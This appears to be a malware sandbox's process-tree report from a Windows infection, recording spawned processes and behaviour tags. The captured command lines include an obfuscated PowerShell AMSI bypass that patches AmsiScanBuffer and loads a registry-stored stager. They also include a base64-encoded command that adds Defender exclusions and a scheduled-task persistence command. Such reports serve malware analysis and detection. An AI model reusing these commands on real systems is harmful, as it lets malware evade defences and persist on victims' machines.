C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:464

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1164
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:jRzTslSfvWwn{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$YILyuZkdWxxvLt,[Parameter(Position=1)][Type]$SsExuaRXBi)$wrLgMBOnGum=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+'l'+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+'lega'+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','Cla'+'s'+''+[Char](115)+','+'P'+'u'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+'iC'+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+'t'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$wrLgMBOnGum.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+','+'H'+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+'lic',[Reflection.CallingConventions]::Standard,$YILyuZkdWxxvLt).SetImplementationFlags(''+'R'+''+'u'+'ntime'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+[Char](100)+'');$wrLgMBOnGum.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+'u'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+'i'+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+''+[Char](103)+''+[Char](44)+'New'+[Char](83)+'lo'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$SsExuaRXBi,$YILyuZkdWxxvLt).SetImplementationFlags(''+'R'+''+'u'+'n'+'t'+''+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'a'+'g'+''+[Char](101)+''+'d'+'');Write-Output $wrLgMBOnGum.CreateType();}$awTmUFcgSEHAo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+'o'+'f'+''+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+''+[Char](51)+'2.U'+'n'+''+[Char](115)+''+[Char](97)+''+'f'+''+'e'+'Na'+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+'t'+''+'h'+''+'o'+'ds');$KCnKOBCiPWJxJY=$awTmUFcgSEHAo.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+'b'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$leCEZZnnTfVIeDzJwSy=jRzTslSfvWwn @([String])([IntPtr]);$yHIomOYNxJtwBeGvFuwWjX=jRzTslSfvWwn @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UEMEzqyogJK=$awTmUFcgSEHAo.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+''+[Char](101)+'H'+[Char](97)+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+'l'+''+[Char](108)+'')));$GWoSAVIaofRnjw=$KCnKOBCiPWJxJY.Invoke($Null,@([Object]$UEMEzqyogJK,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+'Li'+'b'+'ra'+[Char](114)+''+[Char](121)+'A')));$EGBsgndmuFWvWcHDT=$KCnKOBCiPWJxJY.Invoke($Null,@([Object]$UEMEzqyogJK,[Object](''+'V'+'ir'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+'c'+''+[Char](116)+'')));$ZrLiNAG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GWoSAVIaofRnjw,$leCEZZnnTfVIeDzJwSy).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+'.'+[Char](100)+''+[Char](108)+''+'l'+'');$eldrdcubFiUgtafnP=$KCnKOBCiPWJxJY.Invoke($Null,@([Object]$ZrLiNAG,[Object](''+'A'+'ms'+[Char](105)+'Sc'+[Char](97)+'nB'+[Char](117)+'f'+[Char](102)+''+[Char](101)+''+'r'+'')));$jfxbQHYzdA=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EGBsgndmuFWvWcHDT,$yHIomOYNxJtwBeGvFuwWjX).Invoke($eldrdcubFiUgtafnP,[uint32]8,4,[ref]$jfxbQHYzdA);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$eldrdcubFiUgtafnP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EGBsgndmuFWvWcHDT,$yHIomOYNxJtwBeGvFuwWjX).Invoke($eldrdcubFiUgtafnP,[uint32]8,0x20,[ref]$jfxbQHYzdA);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+'W'+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](36)+''+'7'+'7st'+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:704
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBhAGkAdABIAGEAbgBkAGwAZQBcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBhAGkAdABIAGEAbgBkAGwAZQBcAFQAeQBwAGUASQBkAC4AZQB4AGUA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3728
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1644
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:qfmMAHUhcmfs{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IntqZNdrutCqLd,[Parameter(Position=1)][Type]$IatDQClxdf)$RVkeDetdQky=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'edD'+'e'+''+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+'e'+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType('M'+'y'+''+'D'+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+',Pub'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+'a'+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+'s'+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RVkeDetdQky.DefineConstructor(''+'R'+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$IntqZNdrutCqLd).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+'M'+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$RVkeDetdQky.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+'i'+[Char](103)+''+','+'N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+'i'+''+[Char](114)+''+[Char](116)+''+'u'+'a'+'l'+'',$IatDQClxdf,$IntqZNdrutCqLd).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $RVkeDetdQky.CreateType();}$pZArRefBeJFuT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+'m.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+'o'+'f'+'t'+'.'+''+[Char](87)+'i'+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+'i'+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$iRQOZsFxlNHkrl=$pZArRefBeJFuT.GetMethod(''+[Char](71)+''+[Char](101)+'tP'+[Char](114)+''+[Char](111)+'cA'+'d'+'d'+'r'+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EVuQxUBMFHBFzTzSJnM=qfmMAHUhcmfs @([String])([IntPtr]);$NyzWXqDqoHjnPVFFQLfYWl=qfmMAHUhcmfs @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hWgTekyyOaB=$pZArRefBeJFuT.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+'o'+[Char](100)+''+[Char](117)+'le'+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$xxRIqFTnsYmoCk=$iRQOZsFxlNHkrl.Invoke($Null,@([Object]$hWgTekyyOaB,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+'i'+''+'b'+'r'+[Char](97)+''+[Char](114)+'yA')));$wDcYcvvmpKyusMCxW=$iRQOZsFxlNHkrl.Invoke($Null,@([Object]$hWgTekyyOaB,[Object]('Vi'+[Char](114)+'t'+'u'+''+'a'+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+'ec'+[Char](116)+'')));$BtqReAi=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xxRIqFTnsYmoCk,$EVuQxUBMFHBFzTzSJnM).Invoke('am'+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$croxzArPJrMPzJXeQ=$iRQOZsFxlNHkrl.Invoke($Null,@([Object]$BtqReAi,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+''+'S'+''+'c'+''+'a'+''+'n'+''+'B'+'uf'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$DDMlGEUrUP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wDcYcvvmpKyusMCxW,$NyzWXqDqoHjnPVFFQLfYWl).Invoke($croxzArPJrMPzJXeQ,[uint32]8,4,[ref]$DDMlGEUrUP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$croxzArPJrMPzJXeQ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wDcYcvvmpKyusMCxW,$NyzWXqDqoHjnPVFFQLfYWl).Invoke($croxzArPJrMPzJXeQ,[uint32]8,0x20,[ref]$DDMlGEUrUP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+'T'+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  PID:648
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3212
- C:\Users\Admin\AppData\Roaming\WaitHandle\TypeId.exe
  C:\Users\Admin\AppData\Roaming\WaitHandle\TypeId.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5616
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
    3⤵
    PID:2856

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1404

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1428
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1584

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1856

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1868

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1988

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2088

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2596

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3048

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3412

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3460
- C:\Users\Admin\AppData\Local\Temp\1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe
  "C:\Users\Admin\AppData\Local\Temp\1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3688
- - C:\Users\Admin\AppData\Local\Temp\Install.exe
    "C:\Users\Admin\AppData\Local\Temp\Install.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:536
- - C:\Users\Admin\AppData\Local\Temp\$77svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\$77svchost.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2128
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WinUpdate" /tr '"C:\Users\Admin\AppData\Roaming\WinUpdate.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:4152
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2632
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "WinUpdate" /tr '"C:\Users\Admin\AppData\Roaming\WinUpdate.exe"'
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3708
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBE5E.tmp.bat""
      4⤵
      System Location Discovery: System Language Discovery
      PID:3584
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2572
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2556
    - - C:\Users\Admin\AppData\Roaming\WinUpdate.exe
        
        "C:\Users\Admin\AppData\Roaming\WinUpdate.exe"
        5⤵
        Checks computer location settings
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2028
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\pwtleb.exe"' & exit
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4628
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\pwtleb.exe"'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:4308
        
        C:\Users\Admin\AppData\Local\Temp\pwtleb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pwtleb.exe"
        8⤵
        Executes dropped EXE
        
        PID:4704
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\uehcxd.exe"' & exit
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5612
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5628
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\uehcxd.exe"'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:5788
        
        C:\Users\Admin\AppData\Local\Temp\uehcxd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\uehcxd.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6040
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:6060
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\xkpenf.exe"' & exit
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5216
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\xkpenf.exe"'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\xkpenf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xkpenf.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3616

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3836

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:4020

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4236

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4876

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2164

C:\Windows\system32\SppExtComObj.exe
